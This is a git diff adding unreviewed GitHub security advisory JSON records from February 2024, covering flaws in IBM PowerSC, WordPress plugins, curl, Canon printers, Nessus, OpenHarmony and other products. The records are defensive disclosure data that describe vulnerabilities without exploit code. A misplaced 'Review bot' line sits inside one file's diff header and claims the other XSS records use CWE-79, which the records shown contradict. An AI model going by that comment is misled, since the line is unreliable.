index 0000000000000..8319f956f4aee
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-68pq-vjfc-wpgv/GHSA-68pq-vjfc-wpgv.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-68pq-vjfc-wpgv",
+ "modified": "2024-02-02T03:30:32Z",
+ "published": "2024-02-02T03:30:32Z",
+ "aliases": [
+ "CVE-2023-50962"
+ ],
+ "details": "IBM PowerSC 1.3, 2.0, and 2.1 MFA does not implement the \"HTTP Strict Transport Security\" (HSTS) web security policy mechanism. IBM X-Force ID: 276004.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50962"
+ },
+ {
+ "type": "WEB",
+ "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/276004"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.ibm.com/support/pages/node/7113759"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-319"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T02:15:17Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-68qx-6vr4-qq4p/GHSA-68qx-6vr4-qq4p.json b/advisories/unreviewed/2024/02/GHSA-68qx-6vr4-qq4p/GHSA-68qx-6vr4-qq4p.json
new file mode 100644
index 0000000000000..d65f812d36ba1
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-68qx-6vr4-qq4p/GHSA-68qx-6vr4-qq4p.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-68qx-6vr4-qq4p",
+ "modified": "2024-02-07T12:30:26Z",
+ "published": "2024-02-07T12:30:26Z",
+ "aliases": [
+ "CVE-2024-1110"
+ ],
+ "details": "The Podlove Podcast Publisher plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the init() function in all versions up to, and including, 4.0.11. This makes it possible for unauthenticated attackers to import the plugin's settings.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1110"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/podlove/podlove-publisher/commit/7873ff520631087e2f10737860cdcd64d53187ba"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032008%40podlove-podcasting-plugin-for-wordpress&new=3032008%40podlove-podcasting-plugin-for-wordpress&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2c9cf461-572c-4be8-96e6-659acf3208f3?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T11:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-68r4-mq9j-2rrq/GHSA-68r4-mq9j-2rrq.json b/advisories/unreviewed/2024/02/GHSA-68r4-mq9j-2rrq/GHSA-68r4-mq9j-2rrq.json
new file mode 100644
index 0000000000000..d4d40187b801e
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-68r4-mq9j-2rrq/GHSA-68r4-mq9j-2rrq.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-68r4-mq9j-2rrq",
+ "modified": "2024-02-06T03:33:00Z",
+ "published": "2024-02-06T03:33:00Z",
+ "aliases": [
+ "CVE-2024-20810"
+ ],
+ "details": "Implicit intent hijacking vulnerability in Smart Suggestions prior to SMR Feb-2024 Release 1 allows attackers to get sensitive information.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20810"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T03:15:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-694p-hcfm-p8q8/GHSA-694p-hcfm-p8q8.json b/advisories/unreviewed/2024/02/GHSA-694p-hcfm-p8q8/GHSA-694p-hcfm-p8q8.json
new file mode 100644
index 0000000000000..e8eb2743fc847
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-694p-hcfm-p8q8/GHSA-694p-hcfm-p8q8.json
@@ -0,0 +1,50 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-694p-hcfm-p8q8",
+ "modified": "2024-02-06T03:33:00Z",
+ "published": "2024-02-06T03:33:00Z",
+ "aliases": [
+ "CVE-2023-6230"
+ ],
+ "details": "Buffer overflow in the Address Book password process in authentication of Mobile Device Function of Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code.*: Satera LBP670C Series/Satera MF750C Series firmware v03.07 and earlier sold in Japan. Color imageCLASS LBP674C/Color imageCLASS X LBP1333C/Color imageCLASS MF750C Series/Color imageCLASS X MF1333C Series firmware v03.07 and earlier sold in US. i-SENSYS LBP673Cdw/C1333P/i-SENSYS MF750C Series/C1333i Series firmware v03.07 and earlier sold in Europe.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6230"
+ },
+ {
+ "type": "WEB",
+ "url": "https://canon.jp/support/support-info/240205vulnerability-response"
+ },
+ {
+ "type": "WEB",
+ "url": "https://psirt.canon/advisory-information/cp2024-001/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.canon-europe.com/support/product-security-latest-news/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Vulnerability-Measure-Against-Buffer-Overflow-for-Laser-Printers-and-Small-Office-Multifunctional-Printers"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-787"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T01:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-697h-9h25-w4fm/GHSA-697h-9h25-w4fm.json b/advisories/unreviewed/2024/02/GHSA-697h-9h25-w4fm/GHSA-697h-9h25-w4fm.json
new file mode 100644
index 0000000000000..73589ff0bc817
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-697h-9h25-w4fm/GHSA-697h-9h25-w4fm.json
@@ -0,0 +1,43 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-697h-9h25-w4fm",
+ "modified": "2024-02-03T15:30:28Z",
+ "published": "2024-02-03T15:30:28Z",
+ "aliases": [
+ "CVE-2024-0853"
+ ],
+ "details": "curl inadvertently kept the SSL session ID for connections in its cache even when the verify status (*OCSP stapling*) test failed. A subsequent transfer to\nthe same hostname could then succeed if the session ID cache was still fresh, which then skipped the verify status check.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0853"
+ },
+ {
+ "type": "WEB",
+ "url": "https://hackerone.com/reports/2298922"
+ },
+ {
+ "type": "WEB",
+ "url": "https://curl.se/docs/CVE-2024-0853.html"
+ },
+ {
+ "type": "WEB",
+ "url": "https://curl.se/docs/CVE-2024-0853.json"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-03T14:15:50Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-6c6r-r3r9-h62j/GHSA-6c6r-r3r9-h62j.json b/advisories/unreviewed/2024/02/GHSA-6c6r-r3r9-h62j/GHSA-6c6r-r3r9-h62j.json
new file mode 100644
index 0000000000000..61f5ca91084ff
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-6c6r-r3r9-h62j/GHSA-6c6r-r3r9-h62j.json
@@ -0,0 +1,58 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-6c6r-r3r9-h62j",
+ "modified": "2024-02-06T09:31:38Z",
+ "published": "2024-02-06T09:31:38Z",
+ "aliases": [
+ "CVE-2023-4503"
+ ],
+ "details": "An improper initialization vulnerability was found in Galleon. When using Galleon to provision custom EAP or EAP-XP servers, the servers are created unsecured. This issue could allow an attacker to access remote HTTP services available from the server.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4503"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/errata/RHSA-2023:7637"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/errata/RHSA-2023:7638"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/errata/RHSA-2023:7639"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/errata/RHSA-2023:7641"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/security/cve/CVE-2023-4503"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2184751"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-665"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T09:15:52Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-6cj6-cwf2-xhf2/GHSA-6cj6-cwf2-xhf2.json b/advisories/unreviewed/2024/02/GHSA-6cj6-cwf2-xhf2/GHSA-6cj6-cwf2-xhf2.json
new file mode 100644
index 0000000000000..f807d6a3bf32e
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-6cj6-cwf2-xhf2/GHSA-6cj6-cwf2-xhf2.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-6cj6-cwf2-xhf2",
+ "modified": "2024-02-07T09:30:31Z",
+ "published": "2024-02-07T09:30:31Z",
+ "aliases": [
+ "CVE-2023-40355"
+ ],
+ "details": "Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40355"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.axigen.com/knowledgebase/Axigen-WebMail-XSS-Vulnerability-CVE-2023-40355-_396.html"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T08:15:40Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-6f2h-vg2p-qhf2/GHSA-6f2h-vg2p-qhf2.json b/advisories/unreviewed/2024/02/GHSA-6f2h-vg2p-qhf2/GHSA-6f2h-vg2p-qhf2.json
new file mode 100644
index 0000000000000..a1408ab8bb6f7
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-6f2h-vg2p-qhf2/GHSA-6f2h-vg2p-qhf2.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-6f2h-vg2p-qhf2",
+ "modified": "2024-02-03T06:30:24Z",
+ "published": "2024-02-03T06:30:24Z",
+ "aliases": [
+ "CVE-2024-23550"
+ ],
+ "details": "HCL DevOps Deploy / HCL Launch (UCD) could disclose sensitive user information when installing the Windows agent.\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23550"
+ },
+ {
+ "type": "WEB",
+ "url": "https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0110334"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-03T06:15:48Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-6g66-738j-p78c/GHSA-6g66-738j-p78c.json b/advisories/unreviewed/2024/02/GHSA-6g66-738j-p78c/GHSA-6g66-738j-p78c.json
new file mode 100644
index 0000000000000..1a0605a1073a1
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-6g66-738j-p78c/GHSA-6g66-738j-p78c.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-6g66-738j-p78c",
+ "modified": "2024-02-06T15:32:08Z",
+ "published": "2024-02-06T15:32:08Z",
+ "aliases": [
+ "CVE-2024-24592"
+ ],
+ "details": "Lack of authentication in all versions of the fileserver component of Allegro AI’s ClearML platform allows a remote attacker to arbitrarily access, create, modify and delete files. \n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24592"
+ },
+ {
+ "type": "WEB",
+ "url": "https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-425"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T15:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-6gg6-4gm5-vqq7/GHSA-6gg6-4gm5-vqq7.json b/advisories/unreviewed/2024/02/GHSA-6gg6-4gm5-vqq7/GHSA-6gg6-4gm5-vqq7.json
new file mode 100644
index 0000000000000..6d11e35f510d1
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-6gg6-4gm5-vqq7/GHSA-6gg6-4gm5-vqq7.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-6gg6-4gm5-vqq7",
+ "modified": "2024-02-07T09:30:31Z",
+ "published": "2024-02-07T09:30:31Z",
+ "aliases": [
+ "CVE-2024-1055"
+ ],
+ "details": "The PowerPack Addons for Elementor (Free Widgets, Extensions and Templates) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's buttons in all versions up to, and including, 2.7.14 due to insufficient input sanitization and output escaping on user supplied URL values. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1055"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/powerpack-lite-for-elementor/trunk/modules/buttons/widgets/buttons.php#L1544"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030473%40powerpack-lite-for-elementor&new=3030473%40powerpack-lite-for-elementor&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/036cf299-80c2-48a8-befc-02899ab96e3c?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T07:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-6gmm-6q8h-c7mm/GHSA-6gmm-6q8h-c7mm.json b/advisories/unreviewed/2024/02/GHSA-6gmm-6q8h-c7mm/GHSA-6gmm-6q8h-c7mm.json
new file mode 100644
index 0000000000000..a7137a83d6f5c
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-6gmm-6q8h-c7mm/GHSA-6gmm-6q8h-c7mm.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-6gmm-6q8h-c7mm",
+ "modified": "2024-02-02T09:30:22Z",
+ "published": "2024-02-02T09:30:22Z",
+ "aliases": [
+ "CVE-2024-21863"
+ ],
+ "details": "\nin OpenHarmony v4.0.0 and prior versions allow a local attacker cause DOS through improper input.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21863"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-20"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T07:15:12Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-6h3f-p66m-6j79/GHSA-6h3f-p66m-6j79.json b/advisories/unreviewed/2024/02/GHSA-6h3f-p66m-6j79/GHSA-6h3f-p66m-6j79.json
new file mode 100644
index 0000000000000..96a1d9e0ca8c0
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-6h3f-p66m-6j79/GHSA-6h3f-p66m-6j79.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-6h3f-p66m-6j79",
+ "modified": "2024-02-03T03:30:27Z",
+ "published": "2024-02-03T03:30:27Z",
+ "aliases": [
+ "CVE-2023-32329"
+ ],
+ "details": "IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a user to download files from an incorrect repository due to improper file validation. IBM X-Force ID: 254972.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32329"
+ },
+ {
+ "type": "WEB",
+ "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/254972"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.ibm.com/support/pages/node/7106586"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-345"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-03T01:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-6h6q-fm45-w3hv/GHSA-6h6q-fm45-w3hv.json b/advisories/unreviewed/2024/02/GHSA-6h6q-fm45-w3hv/GHSA-6h6q-fm45-w3hv.json
new file mode 100644
index 0000000000000..fa11f4ae0bb4b
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-6h6q-fm45-w3hv/GHSA-6h6q-fm45-w3hv.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-6h6q-fm45-w3hv",
+ "modified": "2024-02-08T00:32:18Z",
+ "published": "2024-02-05T18:31:37Z",
+ "aliases": [
+ "CVE-2024-24259"
+ ],
+ "details": "mupdf v1.23.9 was discovered to contain a memory leak via the menuEntry variable in the glutAddMenuEntry function.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24259"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/yinluming13579/mupdf_defects/blob/main/mupdf_detect_2.md"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-401"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-05T18:15:52Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-6hrp-c93c-rq8p/GHSA-6hrp-c93c-rq8p.json b/advisories/unreviewed/2024/02/GHSA-6hrp-c93c-rq8p/GHSA-6hrp-c93c-rq8p.json
new file mode 100644
index 0000000000000..0847611d992af
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-6hrp-c93c-rq8p/GHSA-6hrp-c93c-rq8p.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-6hrp-c93c-rq8p",
+ "modified": "2024-02-08T21:30:34Z",
+ "published": "2024-02-01T09:30:18Z",
+ "aliases": [
+ "CVE-2024-24548"
+ ],
+ "details": "Payment EX Ver1.1.5b and earlier allows a remote unauthenticated attacker to obtain the information of the user who purchases merchandise using Payment EX.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24548"
+ },
+ {
+ "type": "WEB",
+ "url": "https://jvn.jp/en/jp/JVN41129639/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-01T07:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-6j46-c3h7-p829/GHSA-6j46-c3h7-p829.json b/advisories/unreviewed/2024/02/GHSA-6j46-c3h7-p829/GHSA-6j46-c3h7-p829.json
new file mode 100644
index 0000000000000..9a79baa6069eb
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-6j46-c3h7-p829/GHSA-6j46-c3h7-p829.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-6j46-c3h7-p829",
+ "modified": "2024-02-07T00:30:25Z",
+ "published": "2024-02-07T00:30:25Z",
+ "aliases": [
+ "CVE-2024-0955"
+ ],
+ "details": "\nA stored XSS vulnerability exists where an authenticated, remote attacker with administrator privileges on the Nessus application could alter Nessus proxy settings, which could lead to the execution of remote arbitrary scripts. \n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0955"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.tenable.com/security/tns-2024-01"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-20"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T00:15:55Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-6jg6-g5fm-jqjq/GHSA-6jg6-g5fm-jqjq.json b/advisories/unreviewed/2024/02/GHSA-6jg6-g5fm-jqjq/GHSA-6jg6-g5fm-jqjq.json
new file mode 100644
index 0000000000000..5ed3b8bc52854
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-6jg6-g5fm-jqjq/GHSA-6jg6-g5fm-jqjq.json
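Review bot: `cwe_ids` carries `CWE-20` while the description is a stored XSS reached through the Nessus proxy settings; `CWE-79`, which the other cross-site-scripting records in this batch use, is the more specific weakness, and `CWE-20` is presumably inherited from the upstream classification. With `PR:H` in the vector and `administrator privileges` in the text the severity data is at least internally consistent, so only the weakness tag needs a second look at review time.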
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-6jg6-g5fm-jqjq",
+ "modified": "2024-02-07T00:30:25Z",
+ "published": "2024-02-07T00:30:25Z",
+ "aliases": [
+ "CVE-2024-22520"
+ ],
+ "details": "An issue discovered in Dronetag Drone Scanner 1.5.2 allows attackers to impersonate other drones via transmission of crafted data packets.",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22520"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Drone-Lab/Dronetag-vulnerability"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T22:16:14Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-6mgj-w244-f2gh/GHSA-6mgj-w244-f2gh.json b/advisories/unreviewed/2024/02/GHSA-6mgj-w244-f2gh/GHSA-6mgj-w244-f2gh.json
new file mode 100644
index 0000000000000..6a87bfefc7e63
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-6mgj-w244-f2gh/GHSA-6mgj-w244-f2gh.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-6mgj-w244-f2gh",
+ "modified": "2024-02-02T09:30:21Z",
+ "published": "2024-02-02T09:30:21Z",
+ "aliases": [
+ "CVE-2023-49118"
+ ],
+ "details": "\nin OpenHarmony v3.2.4 and prior versions allow a local attacker causes information leak through out-of-bounds Read.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49118"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-125"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T07:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-6rgx-2w6c-4cv2/GHSA-6rgx-2w6c-4cv2.json b/advisories/unreviewed/2024/02/GHSA-6rgx-2w6c-4cv2/GHSA-6rgx-2w6c-4cv2.json
new file mode 100644
index 0000000000000..5f9542914dbbc
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-6rgx-2w6c-4cv2/GHSA-6rgx-2w6c-4cv2.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-6rgx-2w6c-4cv2",
+ "modified": "2024-02-02T12:30:30Z",
+ "published": "2024-02-02T12:30:30Z",
+ "aliases": [
+ "CVE-2024-1201"
+ ],
+ "details": "Search path or unquoted item vulnerability in HDD Health affecting versions 4.2.0.112 and earlier. This vulnerability could allow a local attacker to store a malicious executable file within the unquoted search path, resulting in privilege escalation.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1201"
+ },
+ {
+ "type": "WEB",
